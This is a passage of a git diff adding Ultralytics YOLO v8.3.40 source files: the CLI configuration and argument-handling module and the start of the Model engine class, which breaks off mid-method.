diff --git a/2024.ultralytics/v8.3.40/__init__.py b/2024.ultralytics/v8.3.40/__init__.py new file mode 100644 index 0000000..601d1bb --- /dev/null +++ b/2024.ultralytics/v8.3.40/__init__.py @@ -0,0 +1,29 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +__version__ = "8.3.40" + +import os + +# Set ENV variables (place before imports) +if not os.environ.get("OMP_NUM_THREADS"): + os.environ["OMP_NUM_THREADS"] = "1" # default for reduced CPU utilization during training + +from ultralytics.models import NAS, RTDETR, SAM, YOLO, FastSAM, YOLOWorld +from ultralytics.utils import ASSETS, SETTINGS +from ultralytics.utils.checks import check_yolo as checks +from ultralytics.utils.downloads import download + +settings = SETTINGS +__all__ = ( + "__version__", + "ASSETS", + "YOLO", + "YOLOWorld", + "NAS", + "SAM", + "FastSAM", + "RTDETR", + "checks", + "download", + "settings", +) diff --git a/2024.ultralytics/v8.3.40/cfg/__init__.py b/2024.ultralytics/v8.3.40/cfg/__init__.py new file mode 100644 index 0000000..e4c239f --- /dev/null +++ b/2024.ultralytics/v8.3.40/cfg/__init__.py @@ -0,0 +1,1014 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import shutil +import subprocess +import sys +from pathlib import Path +from types import SimpleNamespace +from typing import Dict, List, Union + +import cv2 + +from ultralytics.utils import ( + ASSETS, + DEFAULT_CFG, + DEFAULT_CFG_DICT, + DEFAULT_CFG_PATH, + DEFAULT_SOL_DICT, + IS_VSCODE, + LOGGER, + RANK, + ROOT, + RUNS_DIR, + SETTINGS, + SETTINGS_FILE, + TESTS_RUNNING, + IterableSimpleNamespace, + __version__, + checks, + colorstr, + deprecation_warn, + vscode_msg, + yaml_load, + yaml_print, +) + +# Define valid solutions +SOLUTION_MAP = { + "count": ("ObjectCounter", "count"), + "heatmap": ("Heatmap", "generate_heatmap"), + "queue": ("QueueManager", "process_queue"), + "speed": ("SpeedEstimator", "estimate_speed"), + "workout": ("AIGym", "monitor"), + "analytics": ("Analytics", "process_data"), + "trackzone": ("TrackZone", "trackzone"), + 
"help": None, +} + +# Define valid tasks and modes +MODES = {"train", "val", "predict", "export", "track", "benchmark"} +TASKS = {"detect", "segment", "classify", "pose", "obb"} +TASK2DATA = { + "detect": "coco8.yaml", + "segment": "coco8-seg.yaml", + "classify": "imagenet10", + "pose": "coco8-pose.yaml", + "obb": "dota8.yaml", +} +TASK2MODEL = { + "detect": "yolo11n.pt", + "segment": "yolo11n-seg.pt", + "classify": "yolo11n-cls.pt", + "pose": "yolo11n-pose.pt", + "obb": "yolo11n-obb.pt", +} +TASK2METRIC = { + "detect": "metrics/mAP50-95(B)", + "segment": "metrics/mAP50-95(M)", + "classify": "metrics/accuracy_top1", + "pose": "metrics/mAP50-95(P)", + "obb": "metrics/mAP50-95(B)", +} +MODELS = {TASK2MODEL[task] for task in TASKS} + +ARGV = sys.argv or ["", ""] # sometimes sys.argv = [] +SOLUTIONS_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. Ultralytics 'yolo solutions' usage overview: + + yolo solutions SOLUTION ARGS + + Where SOLUTION (optional) is one of {list(SOLUTION_MAP.keys())} + ARGS (optional) are any number of custom 'arg=value' pairs like 'show_in=True' that override defaults + at https://docs.ultralytics.com/usage/cfg + + 1. Call object counting solution + yolo solutions count source="path/to/video/file.mp4" region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] + + 2. Call heatmaps solution + yolo solutions heatmap colormap=cv2.COLORMAP_PARAULA model=yolo11n.pt + + 3. Call queue management solution + yolo solutions queue region=[(20, 400), (1080, 400), (1080, 360), (20, 360)] model=yolo11n.pt + + 4. Call workouts monitoring solution for push-ups + yolo solutions workout model=yolo11n-pose.pt kpts=[6, 8, 10] + + 5. Generate analytical graphs + yolo solutions analytics analytics_type="pie" + + 6. Track Objects Within Specific Zones + yolo solutions trackzone source="path/to/video/file.mp4" region=[(150, 150), (1130, 150), (1130, 570), (150, 570)] + """ +CLI_HELP_MSG = f""" + Arguments received: {str(['yolo'] + ARGV[1:])}. 
Ultralytics 'yolo' commands use the following syntax: + + yolo TASK MODE ARGS + + Where TASK (optional) is one of {TASKS} + MODE (required) is one of {MODES} + ARGS (optional) are any number of custom 'arg=value' pairs like 'imgsz=320' that override defaults. + See all ARGS at https://docs.ultralytics.com/usage/cfg or with 'yolo cfg' + + 1. Train a detection model for 10 epochs with an initial learning_rate of 0.01 + yolo train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01 + + 2. Predict a YouTube video using a pretrained segmentation model at image size 320: + yolo predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320 + + 3. Val a pretrained detection model at batch-size 1 and image size 640: + yolo val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640 + + 4. Export a YOLO11n classification model to ONNX format at image size 224 by 128 (no TASK required) + yolo export model=yolo11n-cls.pt format=onnx imgsz=224,128 + + 5. Streamlit real-time webcam inference GUI + yolo streamlit-predict + + 6. Ultralytics solutions usage + yolo solutions count or in {list(SOLUTION_MAP.keys())} source="path/to/video/file.mp4" + + 7. Run special commands: + yolo help + yolo checks + yolo version + yolo settings + yolo copy-cfg + yolo cfg + yolo solutions help + + Docs: https://docs.ultralytics.com + Solutions: https://docs.ultralytics.com/solutions/ + Community: https://community.ultralytics.com + GitHub: https://github.com/ultralytics/ultralytics + """ + +# Define keys for arg type checks +CFG_FLOAT_KEYS = { # integer or float arguments, i.e. 
def cfg2dict(cfg):
    """
    Normalizes a configuration object into a plain dictionary.

    Args:
        cfg (str | Path | Dict | SimpleNamespace): Configuration source. Strings and Paths are treated as YAML
            file locations, SimpleNamespace objects are unpacked, and anything else is handed back untouched.

    Returns:
        (Dict): The configuration as a dictionary.

    Examples:
        Load a YAML file into a dictionary:
        >>> config_dict = cfg2dict("config.yaml")

        Unpack a SimpleNamespace:
        >>> from types import SimpleNamespace
        >>> config_dict = cfg2dict(SimpleNamespace(param1="value1", param2="value2"))

        A dictionary is passed straight through:
        >>> config_dict = cfg2dict({"param1": "value1", "param2": "value2"})

    Notes:
        - The SimpleNamespace branch returns `vars(cfg)`, i.e. the namespace's own attribute dict, not a copy.
        - Inputs of any other type (including dictionaries) are returned as the very same object.
    """
    if isinstance(cfg, (str, Path)):
        return yaml_load(cfg)  # file path -> parsed YAML
    if isinstance(cfg, SimpleNamespace):
        return vars(cfg)  # namespace -> attribute dict
    return cfg
def check_cfg(cfg, hard=True):
    """
    Checks configuration argument types and values for the Ultralytics library.

    Keys listed in CFG_FLOAT_KEYS, CFG_FRACTION_KEYS, CFG_INT_KEYS and CFG_BOOL_KEYS are validated against their
    expected type. In hard mode a wrong type raises; in soft mode the value is converted in place.

    Args:
        cfg (Dict): Configuration dictionary to validate. Modified in place when values are converted.
        hard (bool): If True, raises TypeError for wrongly typed values; if False, attempts to convert them.

    Raises:
        TypeError: If `hard` is True and a value has the wrong type for its key.
        ValueError: If a fraction key is outside [0.0, 1.0] (raised in both modes), or if a soft-mode
            conversion via `float()` / `int()` fails.

    Examples:
        >>> config = {
        ...     "epochs": 50,  # valid integer
        ...     "lr0": 0.01,  # valid fraction
        ...     "batch": "16",  # numeric string, converted to float in soft mode
        ...     "save": "false",  # boolean string, parsed in soft mode
        ... }
        >>> check_cfg(config, hard=False)
        >>> print(config)
        {'epochs': 50, 'lr0': 0.01, 'batch': 16.0, 'save': False}

    Notes:
        - None values are ignored as they may be from optional arguments.
        - Fraction keys are range-checked even when `hard` is False.
        - `bool` is a subclass of `int`, so boolean values pass the int/float type checks unchanged.
    """
    # Only values of existing keys are reassigned below, so iterating over cfg.items() while writing is safe.
    for k, v in cfg.items():
        if v is None:  # None values may be from optional args
            continue
        if k in CFG_FLOAT_KEYS and not isinstance(v, (int, float)):
            if hard:
                raise TypeError(
                    f"'{k}={v}' is of invalid type {type(v).__name__}. "
                    f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')"
                )
            cfg[k] = float(v)
        elif k in CFG_FRACTION_KEYS:
            if not isinstance(v, (int, float)):
                if hard:
                    raise TypeError(
                        f"'{k}={v}' is of invalid type {type(v).__name__}. "
                        f"Valid '{k}' types are int (i.e. '{k}=0') or float (i.e. '{k}=0.5')"
                    )
                cfg[k] = v = float(v)
            if not (0.0 <= v <= 1.0):
                raise ValueError(f"'{k}={v}' is an invalid value. " f"Valid '{k}' values are between 0.0 and 1.0.")
        elif k in CFG_INT_KEYS and not isinstance(v, int):
            if hard:
                raise TypeError(
                    f"'{k}={v}' is of invalid type {type(v).__name__}. " f"'{k}' must be an int (i.e. '{k}=8')"
                )
            cfg[k] = int(v)
        elif k in CFG_BOOL_KEYS and not isinstance(v, bool):
            if hard:
                raise TypeError(
                    f"'{k}={v}' is of invalid type {type(v).__name__}. "
                    f"'{k}' must be a bool (i.e. '{k}=True' or '{k}=False')"
                )
            # bool("false") is True, so textual booleans must be parsed rather than truth-tested.
            if isinstance(v, str) and v.strip().lower() in {"true", "false"}:
                cfg[k] = v.strip().lower() == "true"
            else:
                cfg[k] = bool(v)
def _handle_deprecation(custom):
    """
    Handles deprecated configuration keys by mapping them to current equivalents with deprecation warnings.

    Args:
        custom (Dict): Configuration dictionary potentially containing deprecated keys.

    Returns:
        (Dict): The same dictionary object, updated in place.

    Examples:
        >>> custom_config = {"boxes": True, "hide_labels": "False", "line_thickness": 2}
        >>> _handle_deprecation(custom_config)
        >>> print(custom_config)
        {'show_boxes': True, 'show_labels': True, 'line_width': 2}

        Real booleans (as produced by the CLI value parser) are inverted as well:
        >>> _handle_deprecation({"hide_conf": False})
        {'show_conf': True}

    Notes:
        - 'boxes' and 'line_thickness' are renamed with their value kept as-is.
        - 'hide_labels' and 'hide_conf' become 'show_labels' and 'show_conf' with the value inverted.
        - 'label_smoothing' is removed without a replacement.
    """

    def _inverted(value):
        """Return the logical opposite of a 'hide_*' flag given as a bool or as 'True'/'False' text."""
        if isinstance(value, str):
            return value.strip().lower() == "false"
        return not value

    # Iterate over a snapshot of the keys because entries are popped and inserted inside the loop.
    for key in list(custom):
        if key == "boxes":
            deprecation_warn(key, "show_boxes")
            custom["show_boxes"] = custom.pop("boxes")
        elif key == "hide_labels":
            deprecation_warn(key, "show_labels")
            custom["show_labels"] = _inverted(custom.pop("hide_labels"))
        elif key == "hide_conf":
            deprecation_warn(key, "show_conf")
            custom["show_conf"] = _inverted(custom.pop("hide_conf"))
        elif key == "line_thickness":
            deprecation_warn(key, "line_width")
            custom["line_width"] = custom.pop("line_thickness")
        elif key == "label_smoothing":
            deprecation_warn(key)
            custom.pop("label_smoothing")

    return custom
def merge_equals_args(args: List[str]) -> List[str]:
    """
    Merges arguments around isolated '=' in a list of strings and joins fragments with brackets.

    This function handles the following cases:
        1. ['arg', '=', 'val'] becomes ['arg=val']
        2. ['arg=', 'val'] becomes ['arg=val']
        3. ['arg', '=val'] becomes ['arg=val']
        4. Joins fragments with brackets, e.g., ['imgsz=[3,', '640,', '640]'] becomes ['imgsz=[3,640,640]']

    Args:
        args (List[str]): A list of strings where each element represents an argument or fragment.

    Returns:
        (List[str]): A new list in which arguments around isolated '=' are merged and bracketed fragments are
            joined. The input list is not modified.

    Examples:
        >>> args = ["arg1", "=", "value", "arg2=", "value2", "arg3", "=value3", "imgsz=[3,", "640,", "640]"]
        >>> merge_equals_args(args)
        ['arg1=value', 'arg2=value2', 'arg3=value3', 'imgsz=[3,640,640]']

    Notes:
        - Equals-sign merging is skipped while a bracketed value is still open; such fragments are simply
          appended to the open value. This avoids indexing an empty result list and merging into the wrong
          argument.
        - A trailing fragment with unbalanced brackets is emitted as-is at the end.
    """
    new_args = []
    current = ""  # accumulated fragments of a bracketed value that has not been closed yet
    depth = 0  # '[' minus ']' seen so far for the value being accumulated

    i = 0
    total = len(args)
    while i < total:
        arg = args[i]
        has_next = i < total - 1

        # Handle equals sign merging (only between complete arguments, never inside an open bracket)
        if depth <= 0:
            if arg == "=" and new_args and has_next:  # merge ['arg', '=', 'val']
                new_args[-1] += f"={args[i + 1]}"
                i += 2
                continue
            if arg.endswith("=") and has_next and "=" not in args[i + 1]:  # merge ['arg=', 'val']
                new_args.append(f"{arg}{args[i + 1]}")
                i += 2
                continue
            if arg.startswith("=") and new_args:  # merge ['arg', '=val']
                new_args[-1] += arg
                i += 1
                continue

        # Handle bracket joining
        depth += arg.count("[") - arg.count("]")
        current += arg
        if depth == 0:
            new_args.append(current)
            current = ""

        i += 1

    # Append any remaining current string
    if current:
        new_args.append(current)

    return new_args
+ """ + from ultralytics import hub + + if args[0] == "login": + key = args[1] if len(args) > 1 else "" + # Log in to Ultralytics HUB using the provided API key + hub.login(key) + elif args[0] == "logout": + # Log out from Ultralytics HUB + hub.logout() + + +def handle_yolo_settings(args: List[str]) -> None: + """ + Handles YOLO settings command-line interface (CLI) commands. + + This function processes YOLO settings CLI commands such as reset and updating individual settings. It should be + called when executing a script with arguments related to YOLO settings management. + + Args: + args (List[str]): A list of command line arguments for YOLO settings management. + + Examples: + >>> handle_yolo_settings(["reset"]) # Reset YOLO settings + >>> handle_yolo_settings(["default_cfg_path=yolo11n.yaml"]) # Update a specific setting + + Notes: + - If no arguments are provided, the function will display the current settings. + - The 'reset' command will delete the existing settings file and create new default settings. + - Other arguments are treated as key-value pairs to update specific settings. + - The function will check for alignment between the provided settings and the existing ones. + - After processing, the updated settings will be displayed. 
def handle_yolo_solutions(args: List[str]) -> None:
    """
    Processes YOLO solutions arguments and runs the specified computer vision solutions pipeline.

    Args:
        args (List[str]): Command-line arguments for configuring and running the Ultralytics YOLO
            solutions: https://docs.ultralytics.com/solutions/. It can include the solution name, source,
            and other configuration parameters. The solution name, if present, is popped from this list.

    Returns:
        None: The function processes video frames and saves the output but doesn't return any value.

    Examples:
        Run people counting solution with default settings:
        >>> handle_yolo_solutions(["count"])

        Run analytics with custom configuration:
        >>> handle_yolo_solutions(["analytics", "conf=0.25", "source=path/to/video/file.mp4"])

    Notes:
        - Valid argument names are the union of DEFAULT_SOL_DICT and DEFAULT_CFG_DICT
        - Arguments can be provided in the format 'key=value' or as boolean flags
        - Available solutions are defined in SOLUTION_MAP with their respective classes and methods
        - If the first argument is not a known solution, the 'count' solution is used
        - `yolo solutions help` logs the usage message and returns without processing any video
        - Output is written to 'solution.avi' inside an auto-incremented 'runs/solutions/exp' directory
        - For 'analytics' solution, frame numbers are passed along for generating analytical graphs
        - Video processing can be interrupted by pressing 'q'
        - Both the capture and the writer are released when processing ends, including on error
    """
    full_args_dict = {**DEFAULT_SOL_DICT, **DEFAULT_CFG_DICT}  # arguments dictionary
    overrides = {}

    # check dictionary alignment
    for arg in merge_equals_args(args):
        arg = arg.lstrip("-").rstrip(",")
        if "=" in arg:
            try:
                k, v = parse_key_value_pair(arg)
                overrides[k] = v
            except (NameError, SyntaxError, ValueError, AssertionError) as e:
                check_dict_alignment(full_args_dict, {arg: ""}, e)
        elif arg in full_args_dict and isinstance(full_args_dict.get(arg), bool):
            overrides[arg] = True
    check_dict_alignment(full_args_dict, overrides)  # dict alignment

    # Get solution name
    if args and args[0] in SOLUTION_MAP:
        if args[0] != "help":
            s_n = args.pop(0)  # Extract the solution name directly
        else:
            LOGGER.info(SOLUTIONS_HELP_MSG)
    else:
        LOGGER.warning(
            f"⚠️ No valid solution provided. Using default 'count'. Available: {', '.join(SOLUTION_MAP.keys())}"
        )
        s_n = "count"  # Default solution if none provided

    if args and args[0] == "help":  # Add check for return if user call `yolo solutions help`
        return

    cls, method = SOLUTION_MAP[s_n]  # solution class name and processing method name

    from ultralytics import solutions  # import ultralytics solutions
    from ultralytics.utils.files import increment_path  # for output directory path update

    solution = getattr(solutions, cls)(IS_CLI=True, **overrides)  # get solution class i.e ObjectCounter
    process = getattr(solution, method)  # get specific function of class for processing i.e, count from ObjectCounter

    cap = cv2.VideoCapture(solution.CFG["source"])  # read the video file
    vw = None  # created inside the try block so the capture is released even if writer setup fails

    try:
        # extract width, height and fps of the video file, create save directory and initialize video writer
        w, h, fps = (int(cap.get(x)) for x in (cv2.CAP_PROP_FRAME_WIDTH, cv2.CAP_PROP_FRAME_HEIGHT, cv2.CAP_PROP_FPS))
        if s_n == "analytics":  # analytical graphs follow fixed shape for output i.e w=1920, h=1080
            w, h = 1920, 1080
        save_dir = increment_path(Path("runs") / "solutions" / "exp", exist_ok=False)
        save_dir.mkdir(parents=True, exist_ok=True)  # create the output directory
        vw = cv2.VideoWriter(str(save_dir / "solution.avi"), cv2.VideoWriter_fourcc(*"mp4v"), fps, (w, h))

        # Process video frames
        f_n = 0  # frame number, required for analytical graphs
        while cap.isOpened():
            success, frame = cap.read()
            if not success:
                break
            frame = process(frame, f_n := f_n + 1) if s_n == "analytics" else process(frame)
            vw.write(frame)
            if cv2.waitKey(1) & 0xFF == ord("q"):
                break
    finally:
        cap.release()
        if vw is not None:
            vw.release()  # finalize the output file; without this the container may be left incomplete
def smart_value(v):
    """
    Turns the textual form of a value into the Python object it most plausibly denotes.

    The words 'none', 'true' and 'false' (in any letter case) map to None, True and False. Every other string is
    evaluated as a Python expression; if evaluation fails for any reason the string is returned unchanged.

    Args:
        v (str): The string representation of the value to be converted.

    Returns:
        (Any): None, a bool, the result of evaluating the expression (e.g. int, float, list, tuple), or the
            original string when it cannot be evaluated.

    Examples:
        >>> smart_value("42")
        42
        >>> smart_value("3.14")
        3.14
        >>> smart_value("True")
        True
        >>> smart_value("None")
        None
        >>> smart_value("some_string")
        'some_string'

    Notes:
        - Keyword matching is case-insensitive.
        - NOTE(review): eval() runs arbitrary expressions with this module's globals in scope, so this must
          only ever be fed trusted input.
        - eval() also sees this function's local names, so the locals are kept to `v` and `v_lower`.
    """
    v_lower = v.lower()
    if v_lower in {"none", "true", "false"}:
        return {"none": None, "true": True, "false": False}[v_lower]
    try:
        return eval(v)
    except Exception:
        return v  # not a valid expression: keep the raw string
+ + Examples: + Train a detection model for 10 epochs with an initial learning_rate of 0.01: + >>> entrypoint("train data=coco8.yaml model=yolo11n.pt epochs=10 lr0=0.01") + + Predict a YouTube video using a pretrained segmentation model at image size 320: + >>> entrypoint("predict model=yolo11n-seg.pt source='https://youtu.be/LNwODJXcvt4' imgsz=320") + + Validate a pretrained detection model at batch-size 1 and image size 640: + >>> entrypoint("val model=yolo11n.pt data=coco8.yaml batch=1 imgsz=640") + + Notes: + - If no arguments are passed, the function will display the usage help message. + - For a list of all available commands and their arguments, see the provided help messages and the + Ultralytics documentation at https://docs.ultralytics.com. + """ + args = (debug.split(" ") if debug else ARGV)[1:] + if not args: # no arguments passed + LOGGER.info(CLI_HELP_MSG) + return + + special = { + "help": lambda: LOGGER.info(CLI_HELP_MSG), + "checks": checks.collect_system_info, + "version": lambda: LOGGER.info(__version__), + "settings": lambda: handle_yolo_settings(args[1:]), + "cfg": lambda: yaml_print(DEFAULT_CFG_PATH), + "hub": lambda: handle_yolo_hub(args[1:]), + "login": lambda: handle_yolo_hub(args), + "logout": lambda: handle_yolo_hub(args), + "copy-cfg": copy_default_cfg, + "streamlit-predict": lambda: handle_streamlit_inference(), + "solutions": lambda: handle_yolo_solutions(args[1:]), + } + full_args_dict = {**DEFAULT_CFG_DICT, **{k: None for k in TASKS}, **{k: None for k in MODES}, **special} + + # Define common misuses of special commands, i.e. -h, -help, --help + special.update({k[0]: v for k, v in special.items()}) # singular + special.update({k[:-1]: v for k, v in special.items() if len(k) > 1 and k.endswith("s")}) # singular + special = {**special, **{f"-{k}": v for k, v in special.items()}, **{f"--{k}": v for k, v in special.items()}} + + overrides = {} # basic overrides, i.e. 
imgsz=320 + for a in merge_equals_args(args): # merge spaces around '=' sign + if a.startswith("--"): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require leading dashes '--', updating to '{a[2:]}'.") + a = a[2:] + if a.endswith(","): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require trailing comma ',', updating to '{a[:-1]}'.") + a = a[:-1] + if "=" in a: + try: + k, v = parse_key_value_pair(a) + if k == "cfg" and v is not None: # custom.yaml passed + LOGGER.info(f"Overriding {DEFAULT_CFG_PATH} with {v}") + overrides = {k: val for k, val in yaml_load(checks.check_yaml(v)).items() if k != "cfg"} + else: + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {a: ""}, e) + + elif a in TASKS: + overrides["task"] = a + elif a in MODES: + overrides["mode"] = a + elif a.lower() in special: + special[a.lower()]() + return + elif a in DEFAULT_CFG_DICT and isinstance(DEFAULT_CFG_DICT[a], bool): + overrides[a] = True # auto-True for default bool args, i.e. 'yolo show' sets show=True + elif a in DEFAULT_CFG_DICT: + raise SyntaxError( + f"'{colorstr('red', 'bold', a)}' is a valid YOLO argument but is missing an '=' sign " + f"to set its value, i.e. try '{a}={DEFAULT_CFG_DICT[a]}'\n{CLI_HELP_MSG}" + ) + else: + check_dict_alignment(full_args_dict, {a: ""}) + + # Check keys + check_dict_alignment(full_args_dict, overrides) + + # Mode + mode = overrides.get("mode") + if mode is None: + mode = DEFAULT_CFG.mode or "predict" + LOGGER.warning(f"WARNING ⚠️ 'mode' argument is missing. Valid modes are {MODES}. Using default 'mode={mode}'.") + elif mode not in MODES: + raise ValueError(f"Invalid 'mode={mode}'. Valid modes are {MODES}.\n{CLI_HELP_MSG}") + + # Task + task = overrides.pop("task", None) + if task: + if task not in TASKS: + raise ValueError(f"Invalid 'task={task}'. 
Valid tasks are {TASKS}.\n{CLI_HELP_MSG}") + if "model" not in overrides: + overrides["model"] = TASK2MODEL[task] + + # Model + model = overrides.pop("model", DEFAULT_CFG.model) + if model is None: + model = "yolo11n.pt" + LOGGER.warning(f"WARNING ⚠️ 'model' argument is missing. Using default 'model={model}'.") + overrides["model"] = model + stem = Path(model).stem.lower() + if "rtdetr" in stem: # guess architecture + from ultralytics import RTDETR + + model = RTDETR(model) # no task argument + elif "fastsam" in stem: + from ultralytics import FastSAM + + model = FastSAM(model) + elif "sam_" in stem or "sam2_" in stem or "sam2.1_" in stem: + from ultralytics import SAM + + model = SAM(model) + else: + from ultralytics import YOLO + + model = YOLO(model, task=task) + if isinstance(overrides.get("pretrained"), str): + model.load(overrides["pretrained"]) + + # Task Update + if task != model.task: + if task: + LOGGER.warning( + f"WARNING ⚠️ conflicting 'task={task}' passed with 'task={model.task}' model. " + f"Ignoring 'task={task}' and updating to 'task={model.task}' to match model." + ) + task = model.task + + # Mode + if mode in {"predict", "track"} and "source" not in overrides: + overrides["source"] = ( + "https://ultralytics.com/images/boats.jpg" if task == "obb" else DEFAULT_CFG.source or ASSETS + ) + LOGGER.warning(f"WARNING ⚠️ 'source' argument is missing. Using default 'source={overrides['source']}'.") + elif mode in {"train", "val"}: + if "data" not in overrides and "resume" not in overrides: + overrides["data"] = DEFAULT_CFG.data or TASK2DATA.get(task or DEFAULT_CFG.task, DEFAULT_CFG.data) + LOGGER.warning(f"WARNING ⚠️ 'data' argument is missing. Using default 'data={overrides['data']}'.") + elif mode == "export": + if "format" not in overrides: + overrides["format"] = DEFAULT_CFG.format or "torchscript" + LOGGER.warning(f"WARNING ⚠️ 'format' argument is missing. 
def copy_default_cfg():
    """
    Duplicate the default configuration file into the current working directory.

    The copy keeps the name of DEFAULT_CFG_PATH with '.yaml' replaced by '_copy.yaml'. File metadata is
    preserved because the copy is made with shutil.copy2. After copying, the source path, the new path and
    an example 'yolo cfg=...' command are logged through LOGGER.

    Examples:
        >>> copy_default_cfg()
        # Output: default.yaml copied to /path/to/current/directory/default_copy.yaml
        # Example YOLO command with this new custom cfg:
        #   yolo cfg='/path/to/current/directory/default_copy.yaml' imgsz=320 batch=8

    Notes:
        - The new file is always created in the current working directory.
        - The original default configuration file is left untouched.
    """
    copy_name = DEFAULT_CFG_PATH.name.replace(".yaml", "_copy.yaml")
    destination = Path.cwd() / copy_name
    shutil.copy2(DEFAULT_CFG_PATH, destination)

    copied_line = f"{DEFAULT_CFG_PATH} copied to {destination}\n"
    usage_line = f"Example YOLO command with this new custom cfg:\n yolo cfg='{destination}' imgsz=320 batch=8"
    LOGGER.info(copied_line + usage_line)
+ ckpt (Dict): The checkpoint data if the model is loaded from a *.pt file. + cfg (str): The configuration of the model if loaded from a *.yaml file. + ckpt_path (str): The path to the checkpoint file. + overrides (Dict): A dictionary of overrides for model configuration. + metrics (Dict): The latest training/validation metrics. + session (HUBTrainingSession): The Ultralytics HUB session, if applicable. + task (str): The type of task the model is intended for. + model_name (str): The name of the model. + + Methods: + __call__: Alias for the predict method, enabling the model instance to be callable. + _new: Initializes a new model based on a configuration file. + _load: Loads a model from a checkpoint file. + _check_is_pytorch_model: Ensures that the model is a PyTorch model. + reset_weights: Resets the model's weights to their initial state. + load: Loads model weights from a specified file. + save: Saves the current state of the model to a file. + info: Logs or returns information about the model. + fuse: Fuses Conv2d and BatchNorm2d layers for optimized inference. + predict: Performs object detection predictions. + track: Performs object tracking. + val: Validates the model on a dataset. + benchmark: Benchmarks the model on various export formats. + export: Exports the model to different formats. + train: Trains the model on a dataset. + tune: Performs hyperparameter tuning. + _apply: Applies a function to the model's tensors. + add_callback: Adds a callback function for an event. + clear_callback: Clears all callbacks for an event. + reset_callbacks: Resets all callbacks to their default functions. 
def __init__(
    self,
    model: Union[str, Path] = "yolo11n.pt",
    task: str = None,
    verbose: bool = False,
) -> None:
    """
    Initializes a new model instance from a model path, name or URL.

    The constructor resets all bookkeeping attributes, normalizes 'model' to a stripped string and then
    dispatches on what that string refers to:
        - an Ultralytics HUB model URL: a HUB session is created and its model file is loaded,
        - a Triton Server URL: the URL itself is stored as the model and initialization stops early,
        - a '.yaml'/'.yml' file: a new model is built via '_new',
        - anything else: the model is loaded via '_load'.

    Args:
        model (Union[str, Path]): Path, name or URL of the model to load or create.
        task (str | None): The task type associated with the model. Forwarded to '_new' / '_load'.
        verbose (bool): If True, enables verbose output when a model is built from a YAML file.

    Notes:
        - For HUB models, 'hub-sdk>=0.0.12' is checked via checks.check_requirements before the session
          is created.
        - NOTE(review): errors raised by the HUB session, '_new' or '_load' are not caught here and
          presumably propagate to the caller unchanged - confirm against those helpers.

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model = Model("path/to/model.yaml", task="detect")
        >>> model = Model("hub_model", verbose=True)
    """
    super().__init__()
    self.callbacks = callbacks.get_default_callbacks()
    self.predictor = None  # reuse predictor
    self.model = None  # model object
    self.trainer = None  # trainer object
    self.ckpt = None  # if loaded from *.pt
    self.cfg = None  # if loaded from *.yaml
    self.ckpt_path = None
    self.overrides = {}  # overrides for trainer object
    self.metrics = None  # validation/training metrics
    self.session = None  # HUB session
    self.task = task  # task type
    model = str(model).strip()  # accept Path objects and tolerate surrounding whitespace

    # Check if Ultralytics HUB model from https://hub.ultralytics.com
    if self.is_hub_model(model):
        # Fetch model from HUB
        checks.check_requirements("hub-sdk>=0.0.12")
        session = HUBTrainingSession.create_session(model)
        model = session.model_file  # continue below with the file provided by the session
        if session.train_args:  # training sent from HUB
            self.session = session  # the session is only kept when HUB supplied training arguments

    # Check if Triton Server model
    elif self.is_triton_model(model):
        self.model_name = self.model = model  # the URL string itself acts as the model
        return  # early exit: nothing is loaded locally and 'self.training' is not deleted

    # Load or create new YOLO model
    if Path(model).suffix in {".yaml", ".yml"}:
        self._new(model, task=task, verbose=verbose)
    else:
        self._load(model, task=task)

    # Delete super().training for accessing self.model.training
    del self.training
Can be a file path, URL, PIL image, numpy array, PyTorch + tensor, or a list/tuple of these. + stream (bool): If True, treat the input source as a continuous stream for predictions. + **kwargs (Any): Additional keyword arguments to configure the prediction process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a + Results object. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model("https://ultralytics.com/images/bus.jpg") + >>> for r in results: + ... print(f"Detected {len(r)} objects in image") + """ + return self.predict(source, stream, **kwargs) + + @staticmethod + def is_triton_model(model: str) -> bool: + """ + Checks if the given model string is a Triton Server URL. + + This static method determines whether the provided model string represents a valid Triton Server URL by + parsing its components using urllib.parse.urlsplit(). + + Args: + model (str): The model string to be checked. + + Returns: + (bool): True if the model string is a valid Triton Server URL, False otherwise. + + Examples: + >>> Model.is_triton_model("http://localhost:8000/v2/models/yolov8n") + True + >>> Model.is_triton_model("yolo11n.pt") + False + """ + from urllib.parse import urlsplit + + url = urlsplit(model) + return url.netloc and url.path and url.scheme in {"http", "grpc"} + + @staticmethod + def is_hub_model(model: str) -> bool: + """ + Check if the provided model is an Ultralytics HUB model. + + This static method determines whether the given model string represents a valid Ultralytics HUB model + identifier. + + Args: + model (str): The model string to check. + + Returns: + (bool): True if the model is a valid Ultralytics HUB model, False otherwise. 
def _new(self, cfg: str, task=None, model=None, verbose=False) -> None:
    """
    Builds a fresh model from a YAML configuration and records the task it is meant for.

    The configuration is loaded with yaml_model_load. When no task is given it is guessed from the loaded
    configuration. The model is then constructed either with the supplied 'model' callable or with the
    class returned by self._smart_load("model").

    Args:
        cfg (str): Path to the model configuration file in YAML format.
        task (str | None): The specific task for the model. If None, it is inferred from the config.
        model (torch.nn.Module | None): A custom model class. If provided, it is used instead of the
            default one for the task.
        verbose (bool): If True, displays model information during construction (only when RANK == -1).

    Examples:
        >>> model = Model()
        >>> model._new("yolov8n.yaml", task="detect", verbose=True)
    """
    parsed_cfg = yaml_model_load(cfg)
    self.cfg = cfg
    self.task = task or guess_model_task(parsed_cfg)

    # Build the network with the custom class when given, otherwise with the task's default class
    builder = model or self._smart_load("model")
    self.model = builder(parsed_cfg, verbose=verbose and RANK == -1)
    self.overrides.update(model=self.cfg, task=self.task)

    # Attach args and task to the network so that models created from YAML can be exported
    network = self.model
    merged_args = dict(DEFAULT_CFG_DICT)
